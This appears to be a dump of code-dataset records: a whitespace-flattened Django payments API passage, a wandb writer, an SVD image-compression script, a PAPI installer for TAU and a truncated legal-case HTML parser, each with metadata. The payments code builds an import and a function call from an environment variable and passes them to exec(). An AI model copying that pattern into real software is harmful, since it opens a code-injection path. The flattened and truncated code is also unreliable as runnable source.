=env('LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE', '') if len(LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE) != 0: try: ltc = LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE.split(":") exec('import '+str(ltc[0])) exec(ltc[1]+"('"+invoice.reference+"')") except Exception as e: print (e) http_status = status.HTTP_201_CREATED serializer = CashSerializer(txn) return Response(serializer.data,status=http_status) except 
serializers.ValidationError: raise except ValidationError as e: raise serializers.ValidationError(str(''.join(e.error_dict.values()[0][0]))) except Exception as e: raise serializers.ValidationError(str(e[0])) class DistrictSerializer(serializers.ModelSerializer): name = serializers.SerializerMethodField() code = serializers.CharField(source='name') class Meta: model = District fields = ('name','code') def get_name(self, obj): return dict(DISTRICT_CHOICES).get(obj.name) class RegionSerializer(serializers.ModelSerializer): districts = DistrictSerializer(many=True) name = serializers.SerializerMethodField() code = serializers.CharField(source='name') class Meta: model = Region fields = ( 'name', 'code', 'districts' ) def get_name(self, obj): return dict(REGION_CHOICES).get(obj.name) class RegionViewSet(viewsets.ReadOnlyModelViewSet): queryset = Region.objects.all() serializer_class = RegionSerializer lookup_field = 'name' ####################################################### # # # /CASH # # # ####################################################### ####################################################### # # # INVOICE # # # ####################################################### class InvoiceTransactionSerializer(serializers.ModelSerializer): cash_transactions=CashSerializer(many=True) bpay_transactions=BpayTransactionSerializer(many=True) bpoint_transactions=BpointTransactionSerializer(many=True) created = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') owner = serializers.CharField(source='owner.email') refundable_cards=BpointTransactionSerializer(many=True) class Meta: model = Invoice fields = ( 'id', 'owner', 'voided', 'order_number', 'num_items', 'amount', 'reference', 'created', 'balance', 'refundable', 'refundable_amount', 'single_card_payment', 'payment_amount', 'payment_status', 'cash_transactions', 'bpay_transactions', 'bpoint_transactions', 'refundable_cards' ) read_only_fields=( 'created', 'id', 'num_items' ) class 
BpayLinkSerializer(serializers.Serializer): bpay = serializers.IntegerField() link = serializers.BooleanField(default=True) def validate_bpay(self,val): try: BpayTransaction.objects.get(id=val) except BpayTransaction.DoesNotExist: raise serializers.ValidationError('The bpay transaction entered does not exist.') return val class InvoiceTransactionViewSet(viewsets.ModelViewSet): queryset = Invoice.objects.all() serializer_class = InvoiceTransactionSerializer lookup_field = 'reference' @detail_route(methods=['get']) def linked_bpay(self, request, *args, **kwargs): try: invoice = self.get_object() # Get all linked bpay transactions linked = InvoiceBPAY.objects.filter(invoice=invoice).values('bpay') txns = BpayTransaction.objects.filter(id__in=linked) serializer = BpayTransactionSerializer(txns, many=True) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(e) @detail_route(methods=['get']) def payments(self, request, *args, **kwargs): try: invoice = self.get_object() # Get all linked bpay transactions payments = [] #cash cash = invoice.cash_transactions.all() for c in cash: payments.append( { 'date':c.created.strftime('%d/%m/%Y'), 'type':c.get_source_display().lower().title() if c.type != 'refund' else 'Manual', 'details':"{}{}".format(c.get_type_display().lower().title(),": {}".format(c.details) if c.details else ''), 'amount':'$ {}'.format(c.amount) if c.type not in ['refund','move_out'] else '$ -{}'.format(c.amount) }) #bpay bpay = invoice.bpay_transactions for b in bpay: payments.append( { 'date':b.p_date.strftime('%d/%m/%Y'), 'type': 'Bpay', 'details':b.get_p_instruction_code_display().lower().title(), 'amount':'$ {}'.format(b.amount) } ) #bpoint bpoint = invoice.bpoint_transactions.filter(response_code=0) for b in bpoint: payments.append( { 'date':b.processed.strftime('%d/%m/%Y'), 'type': 'Credit Card', 'details':b.get_action_display().lower().title(), 'amount':'$ {}'.format(b.amount) 
if b.action != 'refund' else '$ -{}'.format(b.amount) } ) return Response(payments) except serializers.ValidationError: traceback.print_exc() raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(e) @detail_route(methods=['post']) def link(self, request, *args, **kwargs): try: invoice = self.get_object() serializer = BpayLinkSerializer(data=request.data) serializer.is_valid(raise_exception=True) bpay = BpayTransaction.objects.get(id=serializer.validated_data['bpay']) link = serializer.validated_data['link'] if link: if bpay.matched or bpay.linked: raise serializers.ValidationError('This BPAY transaction has already been linked to another invoice.') # Create a link between invoice and bpay txn try: InvoiceBPAY.objects.create(bpay=bpay,invoice=invoice) except Exception: raise else: # Delete the link between invoice and txn try: b= InvoiceBPAY.objects.get(bpay=bpay,invoice=invoice) b.delete() except Exception: raise # Get all linked bpay transactions linked = InvoiceBPAY.objects.filter(invoice=invoice).values('bpay') txns = BpayTransaction.objects.filter(id__in=linked) serializer = BpayTransactionSerializer(txns, many=True) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(e) ####################################################### # # # /INVOICE # # # ####################################################### ####################################################### # # # REPORTS # # # ####################################################### class ReportSerializer(serializers.Serializer): system = serializers.CharField(max_length=4) start = serializers.DateTimeField() end = serializers.DateTimeField() banked_start = serializers.DateTimeField(required=False,allow_null=True) banked_end = serializers.DateTimeField(required=False,allow_null=True) region = serializers.ChoiceField(required=False,allow_null=True,choices=REGION_CHOICES) district = 
serializers.ChoiceField(required=False,allow_null=True,choices=DISTRICT_CHOICES) items = serializers.BooleanField(default=False) '''def validate_system(self,value): try: if not is_valid_system(value): raise serializers.ValidationError('This is not a valid system.') except Exception as e: raise serializers.ValidationError(str(e)) return value''' def validate(self,data): if data['items'] and not (data['banked_start'] and data['banked_end']): raise serializers.ValidationError('banked_start and banked_end are required for items csv. ') return data class ReportCreateView(views.APIView): renderer_classes = (JSONRenderer,) def get(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data report = None data = { "start":request.GET.get('start'), "end":request.GET.get('end'), "banked_start":request.GET.get('banked_start',None), "banked_end":request.GET.get('banked_end',None), "system":request.GET.get('system'), "items": request.GET.get('items', False), "region": request.GET.get('region'), "district": request.GET.get('district') } serializer = ReportSerializer(data=data) serializer.is_valid(raise_exception=True) filename = 'report-{}-{}'.format(str(serializer.validated_data['start']),str(serializer.validated_data['end'])) # Generate Report if serializer.validated_data['items']: report = generate_items_csv(systemid_check(serializer.validated_data['system']), serializer.validated_data['start'], serializer.validated_data['end'], serializer.validated_data['banked_start'], serializer.validated_data['banked_end'], district = serializer.validated_data['district']) else: report = generate_trans_csv(systemid_check(serializer.validated_data['system']) ,serializer.validated_data['start'], serializer.validated_data['end'], district = serializer.validated_data['district']) if report: response = HttpResponse(FileWrapper(report), content_type='text/csv') response['Content-Disposition'] = 'attachment; filename="{}.csv"'.format(filename) return response else: 
raise serializers.ValidationError('No report was generated.') except serializers.ValidationError: raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) class ReportCreateAllocatedView(views.APIView): renderer_classes = (JSONRenderer,) def get(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data report = None data = { "start":request.GET.get('start'), "end":request.GET.get('end'), "banked_start":request.GET.get('banked_start',None), "banked_end":request.GET.get('banked_end',None), "system":request.GET.get('system'), "items": request.GET.get('items', False), "region": request.GET.get('region'), "district": request.GET.get('district') } serializer = ReportSerializer(data=data) serializer.is_valid(raise_exception=True) filename = 'report-{}-{}'.format(str(serializer.validated_data['start']),str(serializer.validated_data['end'])) # Generate Report if serializer.validated_data['items']: report = generate_items_csv_allocated(systemid_check(serializer.validated_data['system']), serializer.validated_data['start'], serializer.validated_data['end'], serializer.validated_data['banked_start'], serializer.validated_data['banked_end'], district = serializer.validated_data['district']) else: report = generate_trans_csv(systemid_check(serializer.validated_data['system']) ,serializer.validated_data['start'], serializer.validated_data['end'], district = serializer.validated_data['district']) if report: response = HttpResponse(FileWrapper(report), content_type='text/csv') response['Content-Disposition'] = 'attachment; filename="{}.csv"'.format(filename) return response else: raise serializers.ValidationError('No report was generated.') except serializers.ValidationError: raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) ####################################################### # # # /REPORTS # # # #######################################################
de
0.301638
####################################################### # # # BPAY # # # ####################################################### #date_modifier = serializers.SerializerMethodField() #settled = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') #"settled", #"date_modifier", #"credit_items", #"credit_amount", #"cheque_items", #"cheque_amount", #"debit_amount", #"debit_items", #"account_total", #"account_records", #"group_total", #"group_accounts", #"group_records", #"file_total", #"file_groups", #"file_records", ####################################################### # # # /BPAY # # # ####################################################### ####################################################### # # # BPOINT # # # ####################################################### Used to create a card point using the api: Example of json request using new card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "card": { "number": "4444333322221111", "cvn": "123", "expiry": "052017" } } Example of json request using stored card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "using_token": "true", "token": "<token_id" } } #parse and validate data # Get the optional paramters for the transaction #Get card details if it is there # Check if the invoice exists if action is payment,preauth # intialize the bpoint facade object # Create card form data # Validate card data using BankcardForm from oscar payments # Get the token ####################################################### # # # /BPOINT # # # ####################################################### ####################################################### # # # CASH # # # ####################################################### Used to create a cash payment using the api: Example of json request: { "invoice": "1000025", "amount": 1, "details" : "refund details" "type": "payment" "source": "cash" } #parse and validate data #Check if the invoice being paid for exists # 
Check if the invoice exists if action is payment,preauth # Check if the amount was specified otherwise pay the whole amount ####################################################### # # # /CASH # # # ####################################################### ####################################################### # # # INVOICE # # # ####################################################### # Get all linked bpay transactions # Get all linked bpay transactions #cash #bpay #bpoint # Create a link between invoice and bpay txn # Delete the link between invoice and txn # Get all linked bpay transactions ####################################################### # # # /INVOICE # # # ####################################################### ####################################################### # # # REPORTS # # # ####################################################### def validate_system(self,value): try: if not is_valid_system(value): raise serializers.ValidationError('This is not a valid system.') except Exception as e: raise serializers.ValidationError(str(e)) return value #parse and validate data # Generate Report #parse and validate data # Generate Report ####################################################### # # # /REPORTS # # # #######################################################
1.536754
2
wandb/sdk/internal/writer.py
Qwasser/client
0
6629042
# # -*- coding: utf-8 -*- """Writer thread.""" from __future__ import print_function import logging from . import datastore logger = logging.getLogger(__name__) class WriteManager(object): def __init__( self, settings, record_q, result_q, ): self._settings = settings self._record_q = record_q self._result_q = result_q self._ds = None def open(self): self._ds = datastore.DataStore() self._ds.open_for_write(self._settings.sync_file) def write(self, record): if not self._ds: self.open() record_type = record.WhichOneof("record_type") assert record_type self._ds.write(record) def finish(self): if self._ds: self._ds.close()
# # -*- coding: utf-8 -*- """Writer thread.""" from __future__ import print_function import logging from . import datastore logger = logging.getLogger(__name__) class WriteManager(object): def __init__( self, settings, record_q, result_q, ): self._settings = settings self._record_q = record_q self._result_q = result_q self._ds = None def open(self): self._ds = datastore.DataStore() self._ds.open_for_write(self._settings.sync_file) def write(self, record): if not self._ds: self.open() record_type = record.WhichOneof("record_type") assert record_type self._ds.write(record) def finish(self): if self._ds: self._ds.close()
en
0.909929
# # -*- coding: utf-8 -*- Writer thread.
2.693127
3
Examples/SVD_py/imgcomp.py
madhavakrishna/libStubs
0
6629043
#!/usr/bin/python3 import sys import numpy as np import matplotlib.pyplot as plt from PIL import Image def imageCompressionSVD(imggray,k): # Read image as matrix imgmat = np.array(list(imggray.getdata(band=0)),float) img_width = imggray.size[0] img_height = imggray.size[1] imgmat.shape = (img_height, img_width) imgmat = np.matrix(imgmat) U, sigma, V = np.linalg.svd(imgmat) if(k > sigma.shape[0]): k = len(sigma) compImg = np.matrix(U[:,:k]) * np.diag(sigma[:k]) * np.matrix(V[:k,:]) #plot image fig, (inImg,outImg) = plt.subplots(nrows=1,ncols=2,sharex=False,sharey=False) inImg.imshow(imgmat, cmap='gray') outImg.imshow(compImg, cmap='gray') plt.show() if __name__ == "__main__" : argc = len(sys.argv) if(argc != 3 or sys.argv[1] == "help") : print("usage: ./imgcomp <image-file> <int>") sys.exit(0) inputFile = sys.argv[1] k = int(sys.argv[2]) img = Image.open(inputFile) imggray = img.convert('L') #convert to gray-scale imageCompressionSVD(imggray,k)
#!/usr/bin/python3 import sys import numpy as np import matplotlib.pyplot as plt from PIL import Image def imageCompressionSVD(imggray,k): # Read image as matrix imgmat = np.array(list(imggray.getdata(band=0)),float) img_width = imggray.size[0] img_height = imggray.size[1] imgmat.shape = (img_height, img_width) imgmat = np.matrix(imgmat) U, sigma, V = np.linalg.svd(imgmat) if(k > sigma.shape[0]): k = len(sigma) compImg = np.matrix(U[:,:k]) * np.diag(sigma[:k]) * np.matrix(V[:k,:]) #plot image fig, (inImg,outImg) = plt.subplots(nrows=1,ncols=2,sharex=False,sharey=False) inImg.imshow(imgmat, cmap='gray') outImg.imshow(compImg, cmap='gray') plt.show() if __name__ == "__main__" : argc = len(sys.argv) if(argc != 3 or sys.argv[1] == "help") : print("usage: ./imgcomp <image-file> <int>") sys.exit(0) inputFile = sys.argv[1] k = int(sys.argv[2]) img = Image.open(inputFile) imggray = img.convert('L') #convert to gray-scale imageCompressionSVD(imggray,k)
en
0.742139
#!/usr/bin/python3 # Read image as matrix #plot image #convert to gray-scale
3.060578
3
packages/taucmdr/cf/software/papi_installation.py
eugeneswalker/taucmdr
0
6629044
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, ParaTools, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# (1) Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# (2) Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# (3) Neither the name of ParaTools, Inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""PAPI software installation management.

PAPI is used to measure hardware performance counters.
"""
# NOTE(review): this module targets Python 2 (`HTMLParser` module import,
# old-style `super(Class, self)` calls) -- keep that in mind before modernizing.

import os
import re
import sys
import fileinput
from HTMLParser import HTMLParser
from subprocess import CalledProcessError
from xml.etree import ElementTree
from taucmdr import logger, util
from taucmdr.error import ConfigurationError
from taucmdr.cf.software import SoftwarePackageError
from taucmdr.cf.software.installation import AutotoolsInstallation
from taucmdr.cf.compiler.host import CC, CXX, IBM, GNU

LOGGER = logger.get_logger(__name__)

# Default download location and the library file that marks a usable install.
REPOS = {None: 'http://icl.utk.edu/projects/papi/downloads/papi-5.5.1.tar.gz'}
LIBRARIES = {None: ['libpapi.a']}


class PapiInstallation(AutotoolsInstallation):
    """Encapsulates a PAPI installation."""

    def __init__(self, sources, target_arch, target_os, compilers):
        # PAPI can't be built with IBM compilers so substitute GNU compilers instead
        if compilers[CC].unwrap().info.family is IBM:
            try:
                gnu_compilers = GNU.installation()
            except ConfigurationError:
                raise SoftwarePackageError("GNU compilers (required to build PAPI) could not be found.")
            compilers = compilers.modify(Host_CC=gnu_compilers[CC], Host_CXX=gnu_compilers[CXX])
        super(PapiInstallation, self).__init__('papi', 'PAPI', sources, target_arch, target_os,
                                               compilers, REPOS, None, LIBRARIES, None)
        # Parsed output of `papi_xml_event_info`, populated lazily by xml_event_info().
        self._xml_event_info = None

    def _prepare_src(self, *args, **kwargs):
        # PAPI's source lives in a 'src' directory instead of the usual top level location
        src_prefix = super(PapiInstallation, self)._prepare_src(*args, **kwargs)
        if os.path.basename(src_prefix) != 'src':
            src_prefix = os.path.join(src_prefix, 'src')
        return src_prefix

    def configure(self, flags):
        # Force PAPI's configure to use the (possibly substituted) host compilers,
        # both via the environment and via explicit configure arguments.
        cc = self.compilers[CC].unwrap().absolute_path
        cxx = self.compilers[CXX].unwrap().absolute_path
        os.environ['CC'] = cc
        os.environ['CXX'] = cxx
        flags.extend(['CC='+cc, 'CXX='+cxx])
        return super(PapiInstallation, self).configure(flags)

    def make(self, flags):
        # PAPI's tests often fail to compile, so disable them.
        for line in fileinput.input(os.path.join(self._src_prefix, 'Makefile'), inplace=1):
            # fileinput.input with inplace=1 redirects stdout to the input file ... freaky
            sys.stdout.write(line.replace('TESTS =', '#TESTS ='))
        super(PapiInstallation, self).make(flags)

    def xml_event_info(self):
        # Lazily install PAPI (if needed) and cache the parsed event catalog.
        if not self._xml_event_info:
            self.install()
            xml_event_info = util.get_command_output(os.path.join(self.bin_path, 'papi_xml_event_info'))
            self._xml_event_info = ElementTree.fromstring(xml_event_info)
        return self._xml_event_info

    def parse_metrics(self, metrics):
        """Extracts PAPI metrics from a list of metrics and strips TAU's metric prefixes."""
        return [re.sub('PAPI_NATIVE[:_]', '', metric) for metric in metrics if metric.startswith("PAPI")]

    def check_metrics(self, metrics):
        """Checks compatibility of PAPI metrics.

        Extracts all PAPI metrics from `metrics` and executes papi_event_chooser
        to check compatibility.

        Args:
            metrics (list): List of metrics.

        Raises:
            ConfigurationError: PAPI metrics are not compatible on the current host.
        """
        papi_metrics = self.parse_metrics(metrics)
        if not papi_metrics:
            return
        self.install()
        event_chooser_cmd = os.path.join(self.bin_path, 'papi_event_chooser')
        cmd = [event_chooser_cmd, 'PRESET'] + papi_metrics
        try:
            util.get_command_output(cmd)
        except CalledProcessError as err:
            # Scan papi_event_chooser's output for the first recognizable failure
            # reason; the for/else falls through when nothing parsable was found.
            for line in err.output.split('\n'):
                if "can't be counted with others" in line:
                    parts = line.split()
                    try:
                        event = parts[1]
                        code = int(parts[-1])
                    except (IndexError, ValueError):
                        continue
                    # Error codes reported by papi_event_chooser.
                    if code == -1:
                        why = ": %s is not compatible with other events" % event
                    elif code == -8:
                        why = ": %s cannot be counted due to resource limitations" % event
                    else:
                        why = ": %s is not supported on this host" % event
                    break
                elif "can't be found" in line:
                    parts = line.split()
                    try:
                        event = parts[1]
                    except IndexError:
                        continue
                    why = ": event %s is not available on the current host" % event
                    break
            else:
                why = ', and output from papi_event_chooser was not parsable.'
            raise ConfigurationError(("PAPI metrics [%s] are not compatible on the current host%s.") %
                                     (', '.join(papi_metrics), why),
                                     "Use papi_avail to check metric availability.",
                                     "Spread the desired metrics over multiple measurements.",
                                     "Choose fewer metrics.",
                                     "You may ignore this if you are cross-compiling.")

    def papi_metrics(self, event_type="PRESET", include_modifiers=False):
        """List PAPI available metrics.

        Returns a list of (name, description) tuples corresponding to the
        requested PAPI event type and possibly the event modifiers.

        Args:
            event_type (str): Either "PRESET" or "NATIVE".
            include_modifiers (bool): If True include event modifiers,
                e.g. BR_INST_EXEC:NONTAKEN_COND as well as BR_INST_EXEC.

        Returns:
            list: List of event name/description tuples.
        """
        assert event_type == "PRESET" or event_type == "NATIVE"
        metrics = []
        html_parser = HTMLParser()

        def _format(item):
            # Unescape HTML entities in the description and normalize it
            # to a capitalized sentence.
            name = item.attrib['name']
            desc = html_parser.unescape(item.attrib['desc'])
            desc = desc[0].capitalize() + desc[1:] + "."
            return name, desc

        xml_event_info = self.xml_event_info()
        for eventset in xml_event_info.iter('eventset'):
            if eventset.attrib['type'] == event_type:
                for event in eventset.iter('event'):
                    if include_modifiers:
                        for modifier in event.iter('modifier'):
                            metrics.append(_format(modifier))
                    metrics.append(_format(event))
        return metrics
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, ParaTools, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# (1) Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# (2) Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# (3) Neither the name of ParaTools, Inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""PAPI software installation management.

PAPI is used to measure hardware performance counters.
"""
# NOTE(review): Python 2 module (`HTMLParser` import, old-style `super`).

import os
import re
import sys
import fileinput
from HTMLParser import HTMLParser
from subprocess import CalledProcessError
from xml.etree import ElementTree
from taucmdr import logger, util
from taucmdr.error import ConfigurationError
from taucmdr.cf.software import SoftwarePackageError
from taucmdr.cf.software.installation import AutotoolsInstallation
from taucmdr.cf.compiler.host import CC, CXX, IBM, GNU

LOGGER = logger.get_logger(__name__)

# Download location and the library that marks a finished installation.
REPOS = {None: 'http://icl.utk.edu/projects/papi/downloads/papi-5.5.1.tar.gz'}
LIBRARIES = {None: ['libpapi.a']}


class PapiInstallation(AutotoolsInstallation):
    """Encapsulates a PAPI installation."""

    def __init__(self, sources, target_arch, target_os, compilers):
        # PAPI can't be built with IBM compilers so substitute GNU compilers instead
        if compilers[CC].unwrap().info.family is IBM:
            try:
                gnu_compilers = GNU.installation()
            except ConfigurationError:
                raise SoftwarePackageError("GNU compilers (required to build PAPI) could not be found.")
            compilers = compilers.modify(Host_CC=gnu_compilers[CC], Host_CXX=gnu_compilers[CXX])
        super(PapiInstallation, self).__init__('papi', 'PAPI', sources, target_arch, target_os,
                                               compilers, REPOS, None, LIBRARIES, None)
        # Parsed `papi_xml_event_info` output, cached lazily.
        self._xml_event_info = None

    def _prepare_src(self, *args, **kwargs):
        # PAPI's source lives in a 'src' directory instead of the usual top level location
        src_prefix = super(PapiInstallation, self)._prepare_src(*args, **kwargs)
        if os.path.basename(src_prefix) != 'src':
            src_prefix = os.path.join(src_prefix, 'src')
        return src_prefix

    def configure(self, flags):
        # Pass the host compilers through both the environment and configure flags.
        cc = self.compilers[CC].unwrap().absolute_path
        cxx = self.compilers[CXX].unwrap().absolute_path
        os.environ['CC'] = cc
        os.environ['CXX'] = cxx
        flags.extend(['CC='+cc, 'CXX='+cxx])
        return super(PapiInstallation, self).configure(flags)

    def make(self, flags):
        # PAPI's tests often fail to compile, so disable them.
        for line in fileinput.input(os.path.join(self._src_prefix, 'Makefile'), inplace=1):
            # fileinput.input with inplace=1 redirects stdout to the input file ... freaky
            sys.stdout.write(line.replace('TESTS =', '#TESTS ='))
        super(PapiInstallation, self).make(flags)

    def xml_event_info(self):
        # Install on demand, then cache the parsed event catalog.
        if not self._xml_event_info:
            self.install()
            xml_event_info = util.get_command_output(os.path.join(self.bin_path, 'papi_xml_event_info'))
            self._xml_event_info = ElementTree.fromstring(xml_event_info)
        return self._xml_event_info

    def parse_metrics(self, metrics):
        """Extracts PAPI metrics from a list of metrics and strips TAU's metric prefixes."""
        return [re.sub('PAPI_NATIVE[:_]', '', metric) for metric in metrics if metric.startswith("PAPI")]

    def check_metrics(self, metrics):
        """Checks compatibility of PAPI metrics.

        Extracts all PAPI metrics from `metrics` and executes papi_event_chooser
        to check compatibility.

        Args:
            metrics (list): List of metrics.

        Raises:
            ConfigurationError: PAPI metrics are not compatible on the current host.
        """
        papi_metrics = self.parse_metrics(metrics)
        if not papi_metrics:
            return
        self.install()
        event_chooser_cmd = os.path.join(self.bin_path, 'papi_event_chooser')
        cmd = [event_chooser_cmd, 'PRESET'] + papi_metrics
        try:
            util.get_command_output(cmd)
        except CalledProcessError as err:
            # Look for the first parsable failure reason in the tool's output;
            # the for/else supplies a fallback message when none is found.
            for line in err.output.split('\n'):
                if "can't be counted with others" in line:
                    parts = line.split()
                    try:
                        event = parts[1]
                        code = int(parts[-1])
                    except (IndexError, ValueError):
                        continue
                    if code == -1:
                        why = ": %s is not compatible with other events" % event
                    elif code == -8:
                        why = ": %s cannot be counted due to resource limitations" % event
                    else:
                        why = ": %s is not supported on this host" % event
                    break
                elif "can't be found" in line:
                    parts = line.split()
                    try:
                        event = parts[1]
                    except IndexError:
                        continue
                    why = ": event %s is not available on the current host" % event
                    break
            else:
                why = ', and output from papi_event_chooser was not parsable.'
            raise ConfigurationError(("PAPI metrics [%s] are not compatible on the current host%s.") %
                                     (', '.join(papi_metrics), why),
                                     "Use papi_avail to check metric availability.",
                                     "Spread the desired metrics over multiple measurements.",
                                     "Choose fewer metrics.",
                                     "You may ignore this if you are cross-compiling.")

    def papi_metrics(self, event_type="PRESET", include_modifiers=False):
        """List PAPI available metrics.

        Returns a list of (name, description) tuples corresponding to the
        requested PAPI event type and possibly the event modifiers.

        Args:
            event_type (str): Either "PRESET" or "NATIVE".
            include_modifiers (bool): If True include event modifiers,
                e.g. BR_INST_EXEC:NONTAKEN_COND as well as BR_INST_EXEC.

        Returns:
            list: List of event name/description tuples.
        """
        assert event_type == "PRESET" or event_type == "NATIVE"
        metrics = []
        html_parser = HTMLParser()

        def _format(item):
            # Unescape HTML entities and capitalize the description.
            name = item.attrib['name']
            desc = html_parser.unescape(item.attrib['desc'])
            desc = desc[0].capitalize() + desc[1:] + "."
            return name, desc

        xml_event_info = self.xml_event_info()
        for eventset in xml_event_info.iter('eventset'):
            if eventset.attrib['type'] == event_type:
                for event in eventset.iter('event'):
                    if include_modifiers:
                        for modifier in event.iter('modifier'):
                            metrics.append(_format(modifier))
                    metrics.append(_format(event))
        return metrics
en
0.743592
# -*- coding: utf-8 -*- # # Copyright (c) 2015, ParaTools, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # (1) Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # (2) Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # (3) Neither the name of ParaTools, Inc. nor the names of its contributors may # be used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # PAPI software installation management. PAPI is used to measure hardware performance counters. Encapsulates a PAPI installation. # PAPI can't be built with IBM compilers so substitute GNU compilers instead # PAPI's source lives in a 'src' directory instead of the usual top level location # PAPI's tests often fail to compile, so disable them. # fileinput.input with inplace=1 redirects stdout to the input file ... 
freaky Extracts PAPI metrics from a list of metrics and strips TAU's metric prefixes. Checks compatibility of PAPI metrics. Extracts all PAPI metrics from `metrics` and executes papi_event_chooser to check compatibility. Args: metrics (list): List of metrics. Raises: ConfigurationError: PAPI metrics are not compatible on the current host. List PAPI available metrics. Returns a list of (name, description) tuples corresponding to the requested PAPI event type and possibly the event modifiers. Args: event_type (str): Either "PRESET" or "NATIVE". include_modifiers (bool): If True include event modifiers, e.g. BR_INST_EXEC:NONTAKEN_COND as well as BR_INST_EXEC. Returns: list: List of event name/description tuples.
1.033652
1
app/analyzer.py
luizhenriquelongo/legal-process-analyzer
1
6629045
def analyze_case(soup):
    """Extract the key fields of a legal-case page from its parsed HTML tree.

    Returns a dict with the case number, class, value, judge, the parties
    involved, and the latest docket movement.
    """
    def label_value(caption):
        # Each field is rendered as a <label> caption followed by a <span>
        # that holds the value.
        return soup.find("label", text=caption).find_next('span').get_text().strip()

    numero_do_processo = label_value("Processo:")
    classe = label_value("Classe:")
    valor_da_causa = label_value("Valor da ação:")
    juiz = label_value("Juiz:")

    ultima_movimentacao = (soup.find(id="tabelaUltimasMovimentacoes")
                           .find_next('span').get_text().strip())

    # One table row per party; collapse internal runs of whitespace.
    partes = [' '.join(row.get_text().split())
              for row in soup.find(id="tablePartesPrincipais").find_all('tr')]

    return {
        "numeroDoProcesso": numero_do_processo,
